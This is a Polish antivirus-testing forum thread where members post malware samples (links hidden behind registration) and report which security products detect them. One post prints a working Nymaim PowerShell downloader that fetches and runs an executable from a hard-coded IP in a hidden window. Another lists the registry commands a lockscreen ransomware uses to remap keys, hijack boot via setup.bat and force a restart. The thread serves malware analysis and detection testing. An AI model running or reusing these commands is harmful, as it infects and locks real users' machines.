Paczki, malware, złośliwe pliki, linki itp.
Secureaplus wykrywa po rozpakowaniu (silnik APEX).
Odpowiedz
MKS_Vir wykrywa po rozpakowaniu
Odpowiedz
Windows Defender Wykrywa przy rozpakowaniu
Post sprawdzony przez  MKS_VIR


Odpowiedz
RAT_Nanocore

Treść widoczna jedynie dla zarejestrowanych użytkowników
Odpowiedz
MKS_Vir nie wykrywa - plik przesłany do analizy
Odpowiedz
SAP - wykrywa / Apex avira eset
Mbam - wykrywa
Zemana - nie wykrywa
Warstwy ochrony

1)Ograniczenie/blokowanie dostępu do danych/aplikacji
2)Odizolowanie i tworzenie osobnych baz danych/aplikacji
3)Kopia zapasowa systemu/ważnych danych.
4)Wykrywanie i kasowanie wirusów/złośliwych aplikacji.
Odpowiedz
Defender wykrywa jako Trojan:Win32/Sonbokli.A!cl
Post sprawdzony przez  MKS_VIR


Odpowiedz
[Malware Pack] 2018-10-15 #43

Treść widoczna jedynie dla zarejestrowanych użytkowników
KIS/EIS/MKS, MBAM, HitmanPro, Eset Online, WF+uBlock
Odpowiedz
SecureAPlus wykrył wszystkie.
Odpowiedz
Defender nie wykrywa 2 plików wysłałem do ich labu
Post sprawdzony przez  MKS_VIR


Odpowiedz
Crystal i MKs_vir koszą wszystkie pliki
Odpowiedz
Nymaim_(PowerShell)

Kod:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo $osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";$poshVersion = $PSVersionTable.PSVersion.Major;if($poshVersion -eq 2){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";;;;;$peDirectURL = 'http://205.185.125.244/1.exe';$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($peDirectURL, $savePath)}elseif($poshVersion -ge 3){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";;;;;$peDirectURL = 'http://205.185.125.244/1.exe';Invoke-WebRequest -Uri $peDirectURL -OutFile $savePath};Start-Process $savePath;;""


Treść widoczna jedynie dla zarejestrowanych użytkowników


VirusScope Comodo wykrywa po uruchomieniu.
Odpowiedz
Jakiś Ransom LockScreen

Treść widoczna jedynie dla zarejestrowanych użytkowników


[Obrazek: yp8IF8T.png]

Dropped files

C:\setup.bat
C:\clear.bat
C:\payload.hta
C:\Users\admin\AppData\Local\Temp\RarSFX0\clear.bat
C:\Users\admin\AppData\Local\Temp\RarSFX0\payload.hta
C:\Users\admin\AppData\Local\Temp\RarSFX0\init.bat
C:\Users\admin\AppData\Local\Temp\RarSFX0\setup.bat

Rejestr:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 0000000000000000040000003800450000003800000038E000000000 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v SetupType /t REG_DWORD /d 2 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v CmdLine /t REG_SZ /d "cmd.exe /C C:\setup.bat" /f

write:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout
HKEY_LOCAL_MACHINE\SYSTEM\Setup

Czynności: Dostęp do interfejsu com Kierunek: LocalSecurityAuthority.Shutdown co doprowadza do restartu CMD shutdown -r -t 35 -f i blokady ekranu.
Odpowiedz
MKS kosi te pliki
Odpowiedz
Kierowany na Polskę od [email protected] Trojan Bankowy: Danabot

Treść widoczna jedynie dla zarejestrowanych użytkowników
Odpowiedz
Windows Defender, F-secure CS 14 i Webroot wykrywają
Odpowiedz
ESET Wykrywa (Sprawdzone w dniu publikacji zapomniałem kliknąć odpowiedz)
Post sprawdzony przez  MKS_VIR


Odpowiedz
Ktoś coś posiada z malware w nowym roku ? Smile
MD + WHHL
Odpowiedz
30 malware

Treść widoczna jedynie dla zarejestrowanych użytkowników
Odpowiedz
Ach ten mks_vir tylko 26/30 - 4 pliki poleciały do ich labu Smile
(Hasło : infected)


Cytat:1.

[Aby zobaczyć linki, zarejestruj się tutaj]

2.

[Aby zobaczyć linki, zarejestruj się tutaj]

3.

[Aby zobaczyć linki, zarejestruj się tutaj]

4.

[Aby zobaczyć linki, zarejestruj się tutaj]


Tych (4) nie widzi mks_vir.


Arcabit przechwycił 1 i 2 - widzę że są różnice wykrywalności po między arcabitem/mks_vir Grin
Odpowiedz


Skocz do:


Użytkownicy przeglądający ten wątek: 23 gości